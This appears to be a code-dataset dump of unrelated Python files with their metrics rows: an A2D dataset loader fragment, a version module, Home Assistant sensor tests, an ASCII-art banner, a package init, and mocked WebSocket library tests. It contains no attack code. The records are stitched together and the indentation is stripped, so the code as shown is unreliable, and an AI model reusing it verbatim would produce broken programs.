label_80to43 = label_80to43.astype(np.uint8)
#print(label_80to43)
label_43to80 = np.ones((num_valid_cls))*255
for i in range(num_valid_cls):
label_43to80[i] = convert_label_back[i]
label_43to80 = label_43to80.astype(np.uint8)
# official color map
cmap = np.array([[0,0,0], # 0
#[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[52,1,1],[103,1,1],[154,1,1],[205,1,1],[255,1,1], # 11-15
[255,51,51],[255,103,103],[255,154,154],[255,205,205],[0,0,0], # 16-20
[52,46,1],[103,92,1],[154,138,1],[205,184,1],[255,230,1], # 21-25
[255,235,51],[255,240,103],[255,245,154],[255,250,205],[0,0,0], # 26-30
[11,52,1],[21,103,1],[31,154,1],[41,205,1],[52,255,1], # 31-35
[92,255,51],[133,255,103],[174,255,154],[215,255,205],[0,0,0], # 36-40
[1,52,36],[1,103,72],[1,154,108],[1,205,143],[1,255,179], #41-45
[51,255,194],[103,255,210],[154,255,225],[205,255,240],[0,0,0], # 46-50
[1,21,52],[1,41,103],[1,62,154],[1,82,205],[1,103,255], # 51-55
[51,133,255],[103,164,255],[154,194,255],[205,225,255],[0,0,0], # 56-60
[26,1,52],[52,1,103],[77,1,154],[103,1,205],[128,1,255], # 61-65
[154,51,255],[179,103,255],[205,154,255],[230,205,255],[0,0,0], #66-70
[52,1,31],[103,1,62],[154,1,92],[205,1,123],[255,1,153], #71-75
[255,51,174],[255,103,194],[255,154,215],[255,205,235] #76-79
])
cmap = cmap.astype(np.uint8)
# 80=1(bg) + 9+7(none) + 7(actor)*9(action)
class_names = np.array([
'background',
'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none',
'none',
'adult-climbing',
'adult-crawling',
'adult-eating',
'adult-flying',
'adult-jumping',
'adult-rolling',
'adult-running',
'adult-walking',
'adult-none',
'none',
'baby-climbing',
'baby-crawling',
'baby-eating',
'baby-flying',
'baby-jumping',
'baby-rolling',
'baby-running',
'baby-walking',
'baby-none',
'none',
'ball-climbing',
'ball-crawling',
'ball-eating',
'ball-flying',
'ball-jumping',
'ball-rolling',
'ball-running',
'ball-walking',
'ball-none',
'none',
'bird-climbing',
'bird-crawling',
'bird-eating',
'bird-flying',
'bird-jumping',
'bird-rolling',
'bird-running',
'bird-walking',
'bird-none',
'none',
'car-climbing',
'car-crawling',
'car-eating',
'car-flying',
'car-jumping',
'car-rolling',
'car-running',
'car-walking',
'car-none',
'none',
'cat-climbing',
'cat-crawling',
'cat-eating',
'cat-flying',
'cat-jumping',
'cat-rolling',
'cat-running',
'cat-walking',
'cat-none',
'none',
'dog-climbing',
'dog-crawling',
'dog-eating',
'dog-flying',
'dog-jumping',
'dog-rolling',
'dog-running',
'dog-walking',
'dog-none',
])
def __init__(self, config, dataset_path):
super(A2DDataset_test, self).__init__()
with open(
os.path.join(dataset_path,'list',
config.data_list + '.txt')) as f:
self.img_list = []
for line in f:
if line[-1] == '\n':
self.img_list.append(line[:-1])
else:
self.img_list.append(line)
self.img_dir = os.path.join(dataset_path, 'pngs320H')
self.config = config
self.class_names = [A2DDataset.class_names[cls] for cls in A2DDataset.valid_cls]
def __len__(self):
return len(self.img_list)
def __getitem__(self, idx):
vd_frame_idx = self.img_list[idx]
image_path = os.path.join(self.img_dir, vd_frame_idx + '.png')
image = cv2.imread(image_path).astype(np.float32)
image = cv2.resize(image, (224, 224))
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406),
(0.229, 0.224, 0.225))])
image = transform(image)
image = image.contiguous().float()
return image
if __name__ == '__main__':
# train_dataset = A2DDataset(train_cfg)
# val_dataset = A2DDataset(val_cfg)
# load training or validation datasets
train_dataset = A2DDataset(train_cfg, '../A2D')
dataloader = DataLoader(train_dataset, batch_size=4,
shuffle=True, num_workers=4)
for i, data in enumerate(dataloader):
print(data[0].size(), data[1].size())
break
# load test datasets
test_dataset = A2DDataset_test(test_cfg, '../A2D')
dataloader = DataLoader(test_dataset, batch_size=1,
shuffle=False, num_workers=1)
for i, data in enumerate(dataloader):
print(data.size())
break
| 35.065728 | 112 | 0.520083 | 2,040 | 14,938 | 3.686765 | 0.128922 | 0.032442 | 0.037495 | 0.041484 | 0.823029 | 0.790055 | 0.765324 | 0.750432 | 0.740327 | 0.729424 | 0 | 0.164045 | 0.306266 | 14,938 | 425 | 113 | 35.148235 | 0.56171 | 0.064065 | 0 | 0.821138 | 0 | 0 | 0.125108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01897 | false | 0 | 0.03523 | 0.00542 | 0.149051 | 0.00542 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f71b749c0a3c50eb1353339b1e450d689b72eb7 | 172 | py | Python | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null | bitcli/core/version.py | jmolinaso/bitcli | 9aa9a5fdc0ff99c14e84564d4c2152f3413656e7 | [
"MIT"
] | null | null | null |
from cement.utils.version import get_version as cement_get_version
VERSION = (1, 0, 0, 'rc', 0)
def get_version(version=VERSION):
return cement_get_version(version)
| 21.5 | 66 | 0.761628 | 27 | 172 | 4.62963 | 0.444444 | 0.32 | 0.408 | 0.368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 0.139535 | 172 | 7 | 67 | 24.571429 | 0.817568 | 0 | 0 | 0 | 0 | 0 | 0.011696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
48ab7e1c3f9f7ed7874464cb98aa6e0db87d5f01 | 2,106 | py | Python | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | 1 | 2019-03-21T14:59:31.000Z | 2019-03-21T14:59:31.000Z | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | null | null | null | tests/components/api_streams/test_sensor.py | pancho-villa/home-assistant | ab17b22239452671f14067571f22aadb9688a3de | [
"Apache-2.0"
] | 1 | 2022-02-20T07:41:14.000Z | 2022-02-20T07:41:14.000Z | """Test cases for the API stream sensor."""
import asyncio
import logging
import pytest
from homeassistant.bootstrap import async_setup_component
from tests.common import assert_setup_component
@pytest.mark.skip(reason="test fails randomly due to race condition.")
async def test_api_streams(hass):
"""Test API streams."""
log = logging.getLogger('homeassistant.components.api')
with assert_setup_component(1):
await async_setup_component(hass, 'sensor', {
'sensor': {
'platform': 'api_streams',
}
})
state = hass.states.get('sensor.connected_clients')
assert state.state == '0'
log.debug('STREAM 1 ATTACHED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
log.debug('STREAM 1 ATTACHED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '2'
log.debug('STREAM 1 RESPONSE CLOSED')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
@pytest.mark.skip(reason="test fails randomly due to race condition.")
async def test_websocket_api(hass):
"""Test API streams."""
log = logging.getLogger('homeassistant.components.websocket_api')
with assert_setup_component(1):
await async_setup_component(hass, 'sensor', {
'sensor': {
'platform': 'api_streams',
}
})
state = hass.states.get('sensor.connected_clients')
assert state.state == '0'
log.debug('WS %s: %s', id(log), 'Connected')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
log.debug('WS %s: %s', id(log), 'Connected')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '2'
log.debug('WS %s: %s', id(log), 'Closed connection')
await asyncio.sleep(0.1)
state = hass.states.get('sensor.connected_clients')
assert state.state == '1'
| 27.710526 | 70 | 0.652422 | 269 | 2,106 | 5.007435 | 0.208178 | 0.053452 | 0.089087 | 0.106904 | 0.830735 | 0.830735 | 0.830735 | 0.824053 | 0.824053 | 0.734967 | 0 | 0.015006 | 0.208927 | 2,106 | 75 | 71 | 28.08 | 0.793517 | 0.017569 | 0 | 0.745098 | 0 | 0 | 0.263758 | 0.127913 | 0 | 0 | 0 | 0 | 0.215686 | 1 | 0 | false | 0 | 0.098039 | 0 | 0.098039 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48b5018ab5b0351f514866f4e20e6bc32bc66e9b | 1,213 | py | Python | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null | LuskiDstat-master - Copy/1.py | Ykluskivps/MY-BOI-NICK-PINGER | 52a7c3bfbc0c5ecbde79078e8f94e158c1fd694c | [
"Apache-2.0"
] | null | null | null |
/\ \ /\__ _\ /\ \/\ \/\ \/\ \ /\__ _\ /\ \/\ \
\ \ \ \/_/\ \/ \ \ \_\ \ \ \/'/'\/_/\ \/ \ \ `\\ \
\ \ \ __\ \ \ \ \ _ \ \ , < \ \ \ \ \ , ` \
\ \ \L\ \\_\ \__\ \ \ \ \ \ \\`\ \_\ \__\ \ \`\ \
\ \____//\_____\\ \_\ \_\ \_\ \_\ /\_____\\ \_\ \_\
\/___/ \/_____/ \/_/\/_/\/_/\/_/ \/_____/ \/_/\/_/
__ __ __ ____ _____ ____
/\ \ /\ \/\ \ /\ _`\ /\ __`\/\ _`\
\ `\`\\/'/\ \ \ \ \ \/\ \ \ \/\ \ \ \L\_\
`\ `\ /' \ \ \ __\ \ \ \ \ \ \ \ \ \ \L_L
`\ \ \ \ \ \L\ \\ \ \_\ \ \ \_\ \ \ \/, \
\ \_\ \ \____/ \ \____/\ \_____\ \____/
\/_/ \/___/ \/___/ \/_____/\/___/
| 67.388889 | 96 | 0.102226 | 5 | 1,213 | 1 | 0.2 | 1.6 | 1.8 | 1.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.670239 | 1,213 | 17 | 97 | 71.352941 | 0.0125 | 0 | 0 | 0 | 0 | 0 | 0.000837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5b227a782767345311b6f44bc81543682a0ed785 | 92 | py | Python | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | piccolo/columns/operators/__init__.py | teners/piccolo | e5c32a4810badf39fc61e465747b7343309d7e12 | [
"MIT"
] | null | null | null | from .math import * # noqa
from .string import * # noqa
from .comparison import * # noqa
| 23 | 33 | 0.673913 | 12 | 92 | 5.166667 | 0.5 | 0.483871 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228261 | 92 | 3 | 34 | 30.666667 | 0.873239 | 0.152174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d28ffaaaafdef138bfa4eb07a80a3ea07411aabb | 26,390 | py | Python | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | tests/test_ws_test.py | jamsidedown/sawpit | 9ef36f10e6deb7f3caab802945afff982abaf986 | [
"MIT"
] | null | null | null | import asyncio
import json
import unittest
from unittest.mock import patch, MagicMock
from requests.exceptions import ConnectTimeout
from sawpit import WSTest, WSResponse, WSMessage, WSTimeoutError, RestRequest
def syncify(coro):
def wrapper(*args, **kwargs):
response = asyncio.run(coro(*args, **kwargs))
return response
return wrapper
class WSTestTests(unittest.TestCase): # noqa: pylint - too-many-public-methods
def test_create_ws_test_with_uri(self):
ws_tester = WSTest('wss://example.com')
self.assertEqual('wss://example.com', ws_tester.uri)
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_whitespace_is_stripped_from_uri_on_connect(self, mock_ssl, mock_websockets):
ws_tester = WSTest('\n wss://example.com \n')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_whitespace_is_stripped_from_uri_with_query_parameter_on_connect(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('\n wss://example.com \n')
.with_parameter('\n test \n', '\n example \n')
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
expected_uri = 'wss://example.com?test=example'
mock_websockets.assert_called_once_with(expected_uri, ssl=ssl_context)
mock_socket.close.assert_called_once()
def test_add_key_value_query_parameter(self):
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
)
self.assertEqual(123, ws_tester.parameters['example'])
def test_add_key_value_message(self):
message = WSMessage().with_attribute('test', 123)
ws_tester = (
WSTest('wss://example.com')
.with_message(message)
)
self.assertEqual(1, len(ws_tester.messages))
self.assertEqual(message, ws_tester.messages[0])
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect(self, mock_ssl, mock_websockets):
ws_tester = WSTest('wss://example.com')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@syncify
async def test_websocket_connect_unsecured(self, mock_websockets):
ws_tester = WSTest('ws://example.com')
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
mock_websockets.assert_called_once_with('ws://example.com')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect_with_parameters(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_parameter('test', 456)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
expected_uri = 'wss://example.com?example=123&test=456'
await ws_tester.run()
mock_websockets.assert_called_once_with(expected_uri, ssl=ssl_context)
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_connect_with_headers(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_header('example', 123)
.with_header('test', 456)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
expected_headers = {
'example': 123,
'test': 456
}
await ws_tester.run()
mock_websockets.assert_called_once_with('wss://example.com', ssl=ssl_context, extra_headers=expected_headers)
mock_socket.close.assert_called_once()
def test_websocket_with_expected_response(self):
response = WSResponse().with_attribute('type')
ws_tester = WSTest('wss://example.com').with_response(response)
self.assertTrue(ws_tester.expected_responses)
self.assertEqual(response, ws_tester.expected_responses[0])
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_receives_and_handles_single_response(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
response_json = json.dumps({'body': {}})
future = asyncio.Future()
future.set_result(response_json)
mock_socket.recv = MagicMock(side_effect=[future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertEqual(response, ws_tester.received_responses[0])
self.assertEqual(response_json, ws_tester.received_json[0])
self.assertTrue(ws_tester.is_complete())
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_receives_and_handles_multiple_responses(self, mock_ssl, mock_websockets):
first_response = WSResponse().with_attribute('body')
second_response = WSResponse().with_attribute('type')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response(first_response)
.with_response(second_response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'body': {}}))
second_future = asyncio.Future()
second_future.set_result(json.dumps({'type': {}}))
mock_socket.recv = MagicMock(side_effect=[second_future, first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertEqual(2, len(ws_tester.received_json))
self.assertEqual(2, len(ws_tester.received_responses))
self.assertTrue(ws_tester.is_complete())
mock_socket.close.assert_called_once()
@syncify
async def test_websocket_receive_when_no_expected_responses(self):
ws_tester = WSTest('wss://example.com')
mock_socket = MagicMock()
await ws_tester._receive_handler(mock_socket, json.dumps({'body': {}})) # noqa: pylint - protected-access
self.assertTrue(ws_tester.received_json)
self.assertFalse(ws_tester.received_responses)
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_response_timeout(0.1)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.response_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout_with_received_response_logging_enabled(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response_timeout(0.1)
.with_received_response_logging()
.with_response(
WSResponse()
.with_attribute('message', 'hello')
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'message': 'bye'}))
mock_socket.recv = MagicMock(side_effect=[first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
with self.assertRaises(WSTimeoutError) as ex:
await ws_tester.run()
expected_error = (
'Timed out waiting for responses:\n{"message": "hello"}\n' +
'Received responses:\n{"message": "bye"}'
)
self.assertEqual(expected_error, str(ex.exception))
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_response_timeout_with_received_response_logging_disabled(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response_timeout(0.1)
.with_response(
WSResponse()
.with_attribute('message', 'hello')
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
first_future = asyncio.Future()
first_future.set_result(json.dumps({'message': 'bye'}))
mock_socket.recv = MagicMock(side_effect=[first_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
with self.assertRaises(WSTimeoutError) as ex:
await ws_tester.run()
expected_error = 'Timed out waiting for responses:\n{"message": "hello"}'
self.assertEqual(expected_error, str(ex.exception))
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_message_timeout(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_message_timeout(0.1)
.with_message(
WSMessage()
.with_attribute('test', 123)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.send = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.message_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_timeout(self, mock_ssl, mock_websockets):
response = WSResponse().with_attribute('body')
ws_tester = (
WSTest('wss://example.com')
.with_parameter('example', 123)
.with_test_timeout(0.1)
.with_response(response)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
self.assertEqual(ws_tester.test_timeout, 0.1)
with self.assertRaises(WSTimeoutError):
await ws_tester.run()
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_send_single_message(self, mock_ssl, mock_websockets):
message = WSMessage().with_attribute('test', 123)
ws_tester = WSTest('wss://example.com').with_message(message)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
future = asyncio.Future()
mock_socket.send = MagicMock(return_value=future)
future.set_result({})
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertFalse(ws_tester.messages)
self.assertEqual(1, len(ws_tester.sent_messages))
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', 123)
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': {}}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_resolved_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', '${type}')
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': 'Hello, world!'}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": "Hello, world!"}')
mock_socket.close.assert_called_once()
@patch('websockets.connect')
@patch('ssl.SSLContext')
@syncify
async def test_websocket_test_receive_response_with_unresolved_trigger(self, mock_ssl, mock_websockets):
ws_tester = (
WSTest('wss://example.com')
.with_response(
WSResponse()
.with_attribute('type')
.with_trigger(
WSMessage()
.with_attribute('test', '${body}')
)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
receive_future = asyncio.Future()
receive_future.set_result(json.dumps({'type': 'Hello, world!'}))
mock_socket.recv = MagicMock(side_effect=[receive_future, asyncio.Future()])
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
ssl_context = MagicMock()
mock_ssl.return_value = ssl_context
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": "${body}"}')
mock_socket.close.assert_called_once()
@patch('asyncio.sleep')
@patch('websockets.connect')
@syncify
async def test_websocket_sending_message_with_delay(self, mock_websockets, mock_sleep):
ws_tester = (
WSTest('ws://example.com')
.with_message(
WSMessage()
.with_attribute('test', 123)
.with_delay(1)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_socket.recv.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
mock_sleep.return_value = asyncio.Future()
mock_sleep.return_value.set_result(None)
await ws_tester.run()
self.assertTrue(ws_tester.is_complete())
mock_socket.send.assert_called_once_with('{"test": 123}')
mock_sleep.assert_called_once_with(1)
mock_socket.close.assert_called_once()
@patch('time.sleep')
@patch('websockets.connect')
@syncify
async def test_websocket_senfing_message_with_no_delay(self, mock_websockets, mock_sleep):
ws_tester = (
WSTest('ws://example.com')
.with_message(
WSMessage()
.with_attribute('test', 123)
)
)
mock_socket = MagicMock()
mock_socket.close = MagicMock(return_value=asyncio.Future())
mock_socket.close.return_value.set_result(MagicMock())
send_future = asyncio.Future()
send_future.set_result({})
mock_socket.send = MagicMock(return_value=send_future)
mock_socket.recv = MagicMock(return_value=asyncio.Future())
mock_socket.recv.return_value.set_result(MagicMock())
mock_websockets.return_value = asyncio.Future()
mock_websockets.return_value.set_result(mock_socket)
await ws_tester.run()
